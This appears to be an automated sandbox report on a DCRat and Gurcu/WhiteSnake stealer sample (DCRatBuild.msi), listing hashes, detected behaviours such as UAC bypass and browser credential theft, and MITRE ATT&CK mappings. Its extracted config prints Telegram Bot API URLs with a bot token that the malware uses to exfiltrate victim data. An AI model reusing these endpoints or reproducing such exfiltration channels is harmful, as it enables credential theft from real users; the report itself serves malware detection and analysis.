General
-
Target
DCRatBuild.msi
-
Size
4.9MB
-
Sample
240911-1k4vravdph
-
MD5
10a32fe9b9bde1619fe90f44f33e83d7
-
SHA1
18925c3452f9a25e131bc0bde7b9476e58a651d6
-
SHA256
70f2953bdc5ac694ceb612a18354d624b5482b38a3cfed67e61fc90b6c7f4bb8
-
SHA512
efda18a6a874d2b2b1cec129ad84199485b7910c210eabf0c1c0f015114e7f1baf2aeb0a41cbe2eafb3e8af4db2b9d4cb7afad6f908d7db74ef6a3c6133aee58
-
SSDEEP
98304:ubo+lbwHPjVTRjInqy49tnouxcWJGTlhIfWNK7XdBoQ0emBUGW:uHlbwrxRjIq1JxcW4TDIfWNcdBfmWGW
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7270981715:AAF4Nhu71Hf548vFJ0h0Xyvg4NGgEExI-NU/sendPhoto?chat_id=7450750733&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%205a7a8bf7fe711539e9b86ea23a057b5824572be3%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20KVIWLPUJ%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CAll%20Users%5CTextInputHost.ex
https://api.telegram.org/bot7270981715:AAF4Nhu71Hf548vFJ0h0Xyvg4NGgEExI-NU/sendDocument?chat_id=7450750733&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%205a7a8bf7fe711539e9b86ea23a057b5824572be3%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.979380
Targets
-
-
Target
DCRatBuild.msi
-
Size
4.9MB
-
MD5
10a32fe9b9bde1619fe90f44f33e83d7
-
SHA1
18925c3452f9a25e131bc0bde7b9476e58a651d6
-
SHA256
70f2953bdc5ac694ceb612a18354d624b5482b38a3cfed67e61fc90b6c7f4bb8
-
SHA512
efda18a6a874d2b2b1cec129ad84199485b7910c210eabf0c1c0f015114e7f1baf2aeb0a41cbe2eafb3e8af4db2b9d4cb7afad6f908d7db74ef6a3c6133aee58
-
SSDEEP
98304:ubo+lbwHPjVTRjInqy49tnouxcWJGTlhIfWNK7XdBoQ0emBUGW:uHlbwrxRjIq1JxcW4TDIfWNcdBfmWGW
Score10/10-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass
-
Credentials from Password Stores: Credentials from Web Browsers
Malicious Access or copy of Web Browser Credential store.
-
DCRat payload
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1